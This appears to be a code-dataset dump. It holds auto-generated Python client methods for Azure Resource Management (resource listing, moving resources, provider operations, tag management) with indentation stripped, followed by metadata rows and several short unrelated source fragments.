if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceListResult(resources=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_json_format_instance = GenericResourceExtended(tags={})
result.resources.append(resource_json_format_instance)
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_json_format_instance.provisioning_state = provisioning_state_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_json_format_instance.properties = properties_instance
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_json_format_instance.provisioning_state = provisioning_state_instance2
plan_value = value_value.get('plan', None)
if plan_value is not None:
plan_instance = Plan()
resource_json_format_instance.plan = plan_instance
name_value = plan_value.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_json_format_instance.id = id_instance
name_value2 = value_value.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_json_format_instance.name = name_instance2
type_value = value_value.get('type', None)
if type_value is not None:
type_instance = type_value
resource_json_format_instance.type = type_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_json_format_instance.location = location_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key = property
tags_value = tags_sequence_element[property]
resource_json_format_instance.tags[tags_key] = tags_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Get a list of deployments.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
ResourceListResult: List of resource groups.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = ResourceListResult(resources=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_json_format_instance = GenericResourceExtended(tags={})
result.resources.append(resource_json_format_instance)
properties_value = value_value.get('properties', None)
if properties_value is not None:
provisioning_state_value = properties_value.get('provisioningState', None)
if provisioning_state_value is not None:
provisioning_state_instance = provisioning_state_value
resource_json_format_instance.provisioning_state = provisioning_state_instance
properties_value2 = value_value.get('properties', None)
if properties_value2 is not None:
properties_instance = json.dumps(properties_value2)
resource_json_format_instance.properties = properties_instance
provisioning_state_value2 = value_value.get('provisioningState', None)
if provisioning_state_value2 is not None:
provisioning_state_instance2 = provisioning_state_value2
resource_json_format_instance.provisioning_state = provisioning_state_instance2
plan_value = value_value.get('plan', None)
if plan_value is not None:
plan_instance = Plan()
resource_json_format_instance.plan = plan_instance
name_value = plan_value.get('name', None)
if name_value is not None:
name_instance = name_value
plan_instance.name = name_instance
publisher_value = plan_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
plan_instance.publisher = publisher_instance
product_value = plan_value.get('product', None)
if product_value is not None:
product_instance = product_value
plan_instance.product = product_instance
promotion_code_value = plan_value.get('promotionCode', None)
if promotion_code_value is not None:
promotion_code_instance = promotion_code_value
plan_instance.promotion_code = promotion_code_instance
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
resource_json_format_instance.id = id_instance
name_value2 = value_value.get('name', None)
if name_value2 is not None:
name_instance2 = name_value2
resource_json_format_instance.name = name_instance2
type_value = value_value.get('type', None)
if type_value is not None:
type_instance = type_value
resource_json_format_instance.type = type_instance
location_value = value_value.get('location', None)
if location_value is not None:
location_instance = location_value
resource_json_format_instance.location = location_instance
tags_sequence_element = value_value.get('tags', None)
if tags_sequence_element is not None:
for property in tags_sequence_element:
tags_key = property
tags_value = tags_sequence_element[property]
resource_json_format_instance.tags[tags_key] = tags_value
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def move_resources(self, source_resource_group_name, parameters):
"""
Move resources within or across subscriptions.
Args:
source_resource_group_name (string): Source resource group name.
parameters (ResourcesMoveInfo): move resources' parameters.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if source_resource_group_name is None:
raise ValueError('source_resource_group_name cannot be None.')
if parameters is None:
raise ValueError('parameters cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/resourceGroups/'
url = url + quote(source_resource_group_name)
url = url + '/moveResources'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'POST'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Serialize Request
request_content = None
request_doc = None
resources_move_info_value = {}
request_doc = resources_move_info_value
if parameters.resources is not None:
resources_array = []
for resources_item in parameters.resources:
resources_array.append(resources_item)
resources_move_info_value['resources'] = resources_array
if parameters.target_resource_group is not None:
resources_move_info_value['targetResourceGroup'] = parameters.target_resource_group
request_content = json.dumps(request_doc)
http_request.data = request_content
http_request.headers['Content-Length'] = len(request_content)
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 202:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class ResourceProviderOperationDetailsOperations(object):
"""
Operations for managing Resource provider operations.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def list(self, identity):
"""
Gets a list of resource providers.
Args:
identity (ResourceIdentity): Resource identity.
Returns:
ResourceProviderOperationDetailListResult: List of resource provider
operations.
"""
# Validate
if identity is None:
raise ValueError('identity cannot be None.')
if identity.resource_name is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_api_version is None:
raise ValueError('identity. cannot be None.')
if identity.resource_provider_namespace is None:
raise ValueError('identity. cannot be None.')
if identity.resource_type is None:
raise ValueError('identity. cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/providers/'
url = url + quote(identity.resource_provider_namespace)
url = url + '/operations'
query_parameters = []
query_parameters.append('api-version=' + quote(identity.resource_provider_api_version))
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 204:
response_content = body
result = ResourceProviderOperationDetailListResult(resource_provider_operation_details=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
resource_provider_operation_definition_instance = ResourceProviderOperationDefinition()
result.resource_provider_operation_details.append(resource_provider_operation_definition_instance)
name_value = value_value.get('name', None)
if name_value is not None:
name_instance = name_value
resource_provider_operation_definition_instance.name = name_instance
display_value = value_value.get('display', None)
if display_value is not None:
display_instance = ResourceProviderOperationDisplayProperties()
resource_provider_operation_definition_instance.resource_provider_operation_display_properties = display_instance
publisher_value = display_value.get('publisher', None)
if publisher_value is not None:
publisher_instance = publisher_value
display_instance.publisher = publisher_instance
provider_value = display_value.get('provider', None)
if provider_value is not None:
provider_instance = provider_value
display_instance.provider = provider_instance
resource_value = display_value.get('resource', None)
if resource_value is not None:
resource_instance = resource_value
display_instance.resource = resource_instance
operation_value = display_value.get('operation', None)
if operation_value is not None:
operation_instance = operation_value
display_instance.operation = operation_instance
description_value = display_value.get('description', None)
if description_value is not None:
description_instance = description_value
display_instance.description = description_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
class TagOperations(object):
"""
Operations for managing tags.
__NOTE__: An instance of this class is automatically created for an
instance of the [ResourceManagementClient]
"""
def __init__(self, client):
self._client = client
@property
def client(self):
"""
Gets a reference to the
Microsoft.Azure.Management.Resources.ResourceManagementClient.
"""
return self._client
def create_or_update(self, tag_name):
"""
Create a subscription resource tag.
Args:
tag_name (string): The name of the tag.
Returns:
TagCreateResult: Tag information.
"""
# Validate
if tag_name is None:
raise ValueError('tag_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/tagNames/'
url = url + quote(tag_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = TagCreateResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
tag_instance = TagDetails(values=[])
result.tag = tag_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
tag_instance.id = id_instance
tag_name_value = response_doc.get('tagName', None)
if tag_name_value is not None:
tag_name_instance = tag_name_value
tag_instance.name = tag_name_instance
count_value = response_doc.get('count', None)
if count_value is not None:
count_instance = TagCount()
tag_instance.count = count_instance
type_value = count_value.get('type', None)
if type_value is not None:
type_instance = type_value
count_instance.type = type_instance
value_value = count_value.get('value', None)
if value_value is not None:
value_instance = value_value
count_instance.value = value_instance
values_array = response_doc.get('values', None)
if values_array is not None:
for values_value in values_array:
tag_value_instance = TagValue()
tag_instance.values.append(tag_value_instance)
id_value2 = values_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
tag_value_instance.id = id_instance2
tag_value_value = values_value.get('tagValue', None)
if tag_value_value is not None:
tag_value_instance2 = tag_value_value
tag_value_instance.value = tag_value_instance2
count_value2 = values_value.get('count', None)
if count_value2 is not None:
count_instance2 = TagCount()
tag_value_instance.count = count_instance2
type_value2 = count_value2.get('type', None)
if type_value2 is not None:
type_instance2 = type_value2
count_instance2.type = type_instance2
value_value2 = count_value2.get('value', None)
if value_value2 is not None:
value_instance2 = value_value2
count_instance2.value = value_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def create_or_update_value(self, tag_name, tag_value):
"""
Create a subscription resource tag value.
Args:
tag_name (string): The name of the tag.
tag_value (string): The value of the tag.
Returns:
TagCreateValueResult: Tag information.
"""
# Validate
if tag_name is None:
raise ValueError('tag_name cannot be None.')
if tag_value is None:
raise ValueError('tag_value cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/tagNames/'
url = url + quote(tag_name)
url = url + '/tagValues/'
url = url + quote(tag_value)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'PUT'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 201:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200 or status_code == 201:
response_content = body
result = TagCreateValueResult()
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_instance = TagValue()
result.value = value_instance
id_value = response_doc.get('id', None)
if id_value is not None:
id_instance = id_value
value_instance.id = id_instance
tag_value_value = response_doc.get('tagValue', None)
if tag_value_value is not None:
tag_value_instance = tag_value_value
value_instance.value = tag_value_instance
count_value = response_doc.get('count', None)
if count_value is not None:
count_instance = TagCount()
value_instance.count = count_instance
type_value = count_value.get('type', None)
if type_value is not None:
type_instance = type_value
count_instance.type = type_instance
value_value = count_value.get('value', None)
if value_value is not None:
value_instance2 = value_value
count_instance.value = value_instance2
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def delete(self, tag_name):
"""
Delete a subscription resource tag.
Args:
tag_name (string): The name of the tag.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if tag_name is None:
raise ValueError('tag_name cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/tagNames/'
url = url + quote(tag_name)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'DELETE'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def delete_value(self, tag_name, tag_value):
"""
Delete a subscription resource tag value.
Args:
tag_name (string): The name of the tag.
tag_value (string): The value of the tag.
Returns:
AzureOperationResponse: A standard service response including an HTTP
status code and request ID.
"""
# Validate
if tag_name is None:
raise ValueError('tag_name cannot be None.')
if tag_value is None:
raise ValueError('tag_value cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/tagNames/'
url = url + quote(tag_name)
url = url + '/tagValues/'
url = url + quote(tag_value)
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'DELETE'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200 and status_code != 204:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
result = AzureOperationResponse()
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list(self):
"""
Get a list of subscription resource tags.
Returns:
TagsListResult: List of subscription tags.
"""
# Validate
# Tracing
# Construct URL
url = ''
url = url + '/subscriptions/'
if self.client.credentials.subscription_id is not None:
url = url + quote(self.client.credentials.subscription_id)
url = url + '/tagNames'
query_parameters = []
query_parameters.append('api-version=2014-04-01-preview')
if len(query_parameters) > 0:
url = url + '?' + '&'.join(query_parameters)
base_url = self.client.base_uri
# Trim '/' character from the end of baseUrl and beginning of url.
if base_url[len(base_url) - 1] == '/':
base_url = base_url[0 : len(base_url) - 1]
if url[0] == '/':
url = url[1 : ]
url = base_url + '/' + url
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = TagsListResult(tags=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
tag_details_instance = TagDetails(values=[])
result.tags.append(tag_details_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
tag_details_instance.id = id_instance
tag_name_value = value_value.get('tagName', None)
if tag_name_value is not None:
tag_name_instance = tag_name_value
tag_details_instance.name = tag_name_instance
count_value = value_value.get('count', None)
if count_value is not None:
count_instance = TagCount()
tag_details_instance.count = count_instance
type_value = count_value.get('type', None)
if type_value is not None:
type_instance = type_value
count_instance.type = type_instance
value_value2 = count_value.get('value', None)
if value_value2 is not None:
value_instance = value_value2
count_instance.value = value_instance
values_array = value_value.get('values', None)
if values_array is not None:
for values_value in values_array:
tag_value_instance = TagValue()
tag_details_instance.values.append(tag_value_instance)
id_value2 = values_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
tag_value_instance.id = id_instance2
tag_value_value = values_value.get('tagValue', None)
if tag_value_value is not None:
tag_value_instance2 = tag_value_value
tag_value_instance.value = tag_value_instance2
count_value2 = values_value.get('count', None)
if count_value2 is not None:
count_instance2 = TagCount()
tag_value_instance.count = count_instance2
type_value2 = count_value2.get('type', None)
if type_value2 is not None:
type_instance2 = type_value2
count_instance2.type = type_instance2
value_value3 = count_value2.get('value', None)
if value_value3 is not None:
value_instance2 = value_value3
count_instance2.value = value_instance2
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
def list_next(self, next_link):
"""
Get a list of tags under a subscription.
Args:
next_link (string): NextLink from the previous successful call to List
operation.
Returns:
TagsListResult: List of subscription tags.
"""
# Validate
if next_link is None:
raise ValueError('next_link cannot be None.')
# Tracing
# Construct URL
url = ''
url = url + next_link
url = url.replace(' ', '%20')
# Create HTTP transport objects
http_request = Request()
http_request.url = url
http_request.method = 'GET'
# Set Headers
http_request.headers['Content-Type'] = 'application/json; charset=utf-8'
# Send Request
response = self.client.send_request(http_request)
body = response.content
status_code = response.status_code
if status_code != 200:
error = AzureHttpError(body, response.status_code)
raise error
# Create Result
result = None
# Deserialize Response
if status_code == 200:
response_content = body
result = TagsListResult(tags=[])
response_doc = None
if response_content:
response_doc = json.loads(response_content.decode())
if response_doc is not None:
value_array = response_doc.get('value', None)
if value_array is not None:
for value_value in value_array:
tag_details_instance = TagDetails(values=[])
result.tags.append(tag_details_instance)
id_value = value_value.get('id', None)
if id_value is not None:
id_instance = id_value
tag_details_instance.id = id_instance
tag_name_value = value_value.get('tagName', None)
if tag_name_value is not None:
tag_name_instance = tag_name_value
tag_details_instance.name = tag_name_instance
count_value = value_value.get('count', None)
if count_value is not None:
count_instance = TagCount()
tag_details_instance.count = count_instance
type_value = count_value.get('type', None)
if type_value is not None:
type_instance = type_value
count_instance.type = type_instance
value_value2 = count_value.get('value', None)
if value_value2 is not None:
value_instance = value_value2
count_instance.value = value_instance
values_array = value_value.get('values', None)
if values_array is not None:
for values_value in values_array:
tag_value_instance = TagValue()
tag_details_instance.values.append(tag_value_instance)
id_value2 = values_value.get('id', None)
if id_value2 is not None:
id_instance2 = id_value2
tag_value_instance.id = id_instance2
tag_value_value = values_value.get('tagValue', None)
if tag_value_value is not None:
tag_value_instance2 = tag_value_value
tag_value_instance.value = tag_value_instance2
count_value2 = values_value.get('count', None)
if count_value2 is not None:
count_instance2 = TagCount()
tag_value_instance.count = count_instance2
type_value2 = count_value2.get('type', None)
if type_value2 is not None:
type_instance2 = type_value2
count_instance2.type = type_instance2
value_value3 = count_value2.get('value', None)
if value_value3 is not None:
value_instance2 = value_value3
count_instance2.value = value_instance2
odatanext_link_value = response_doc.get('@odata.nextLink', None)
if odatanext_link_value is not None:
odatanext_link_instance = odatanext_link_value
result.next_link = odatanext_link_instance
result.status_code = status_code
result.request_id = response.headers.get('x-ms-request-id')
return result
| 41.520154 | 145 | 0.52648 | 28,211 | 312,107 | 5.552196 | 0.017724 | 0.017972 | 0.03235 | 0.02172 | 0.896133 | 0.87608 | 0.858484 | 0.844445 | 0.83568 | 0.824456 | 0 | 0.007197 | 0.409654 | 312,107 | 7,516 | 146 | 41.525679 | 0.842905 | 0.023079 | 0 | 0.865081 | 0 | 0 | 0.053223 | 0.00512 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.002162 | null | null | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
9911afe6a11c60507e5252e18e39f719ff1c7ce0 | 117 | py | Python | tensor2struct/models/spider/__init__.py | chenyangh/tensor2struct-public | d3257cba6d76d3c658a58a78f687d986bdc755cf | [
"MIT"
] | 69 | 2021-04-14T06:35:07.000Z | 2022-03-31T18:35:05.000Z | tensor2struct/models/spider/__init__.py | chenyangh/tensor2struct-public | d3257cba6d76d3c658a58a78f687d986bdc755cf | [
"MIT"
] | 11 | 2021-04-16T11:16:04.000Z | 2022-03-22T21:21:29.000Z | tensor2struct/models/spider/__init__.py | chenyangh/tensor2struct-public | d3257cba6d76d3c658a58a78f687d986bdc755cf | [
"MIT"
] | 18 | 2021-04-14T07:19:56.000Z | 2022-03-23T19:26:18.000Z | from . import spider_enc
from . import spider_enc_bert
from . import spider_linking
from . import spider_beam_search
| 23.4 | 32 | 0.82906 | 18 | 117 | 5.055556 | 0.444444 | 0.43956 | 0.703297 | 0.417582 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.136752 | 117 | 4 | 33 | 29.25 | 0.90099 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 8 |
9913035863fa608d04a4ebcb4050ef467e57d3d5 | 111 | py | Python | src/regnet/helpers/quaternion/__init__.py | markrofail/multi-modal-deep-learning-for-vehicle-sensor-data-abstraction-and-attack-detection | 2f252c072f3091bb27506978dd90311f7f82f386 | [
"MIT"
] | null | null | null | src/regnet/helpers/quaternion/__init__.py | markrofail/multi-modal-deep-learning-for-vehicle-sensor-data-abstraction-and-attack-detection | 2f252c072f3091bb27506978dd90311f7f82f386 | [
"MIT"
] | 6 | 2020-09-25T22:41:00.000Z | 2021-06-08T21:50:37.000Z | src/regnet/helpers/quaternion/__init__.py | markrofail/multi-modal-deep-learning-for-vehicle-sensor-data-abstraction-and-attack-detection | 2f252c072f3091bb27506978dd90311f7f82f386 | [
"MIT"
] | null | null | null | from . import (mat3_op, mat4_op, quat_op, dualqt_op)
__all__ = ['mat3_op', 'mat4_op', 'quat_op', 'dualqt_op']
| 27.75 | 56 | 0.693694 | 19 | 111 | 3.421053 | 0.421053 | 0.184615 | 0.307692 | 0.369231 | 0.8 | 0.8 | 0.8 | 0.8 | 0 | 0 | 0 | 0.041237 | 0.126126 | 111 | 3 | 57 | 37 | 0.628866 | 0 | 0 | 0 | 0 | 0 | 0.27027 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.5 | 0 | 0.5 | 0 | 1 | 0 | 0 | null | 0 | 1 | 1 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 8 |
991fdbb6de583d070861094c0282db0ee6327158 | 103 | py | Python | src/daemon/Configuration/__init__.py | 0CT3T/Daemon_Home_Integration | 207f1169445166689ccc2803d4c49e9aea60890a | [
"MIT"
] | 1 | 2019-03-22T03:46:58.000Z | 2019-03-22T03:46:58.000Z | src/daemon/Configuration/__init__.py | 0CT3T/Daemon_Home_Integration | 207f1169445166689ccc2803d4c49e9aea60890a | [
"MIT"
] | null | null | null | src/daemon/Configuration/__init__.py | 0CT3T/Daemon_Home_Integration | 207f1169445166689ccc2803d4c49e9aea60890a | [
"MIT"
] | 1 | 2016-01-15T14:07:16.000Z | 2016-01-15T14:07:16.000Z |
from daemon.Configuration.configuration import configuration
from daemon.Configuration.Modele import * | 34.333333 | 60 | 0.873786 | 11 | 103 | 8.181818 | 0.454545 | 0.222222 | 0.511111 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.07767 | 103 | 3 | 61 | 34.333333 | 0.947368 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
998eb9d7dacb040938d54d2afd76c1c8e97ec83a | 2,742 | py | Python | src/view/view.py | samlowe106/PaperScraper | 1069140f63d0d1f76349bd407574ad0dbf6e3ca9 | [
"MIT"
] | null | null | null | src/view/view.py | samlowe106/PaperScraper | 1069140f63d0d1f76349bd407574ad0dbf6e3ca9 | [
"MIT"
] | 1 | 2022-02-23T07:31:33.000Z | 2022-02-23T07:31:33.000Z | src/view/view.py | samlowe106/PaperScraper | 1069140f63d0d1f76349bd407574ad0dbf6e3ca9 | [
"MIT"
] | null | null | null | from getpass import getpass
from typing import Any
class View():
"""
Interface representing a way to interact with PaperScraper
"""
def output(self, message: str) -> None:
"""
Shows output to the user
:param message: message to show the user
"""
def get_input(self, prompt: str, field: str) -> str:
"""
Gets user input
NOTE: DO NOT USE FOR SENSITIVE DATA! For sensitive data such as passwords,
use get_password instead!
:param prompt: prompt to show the user
:param field: the field from which to retrieve user input (if necessary)
:return: user input
"""
def get_password(self, prompt: str) -> str:
"""
Gets sensitive user input, such as a password, in a secure way
:param prompt: prompt to show the user
:return: user input
"""
class TextView(View):
"""
Class representing a way to interact with PaperScraper through the Terminal or Command Line
"""
def __init__(self):
return
def print_message(self, message: Any):
"""
Shows output to the user
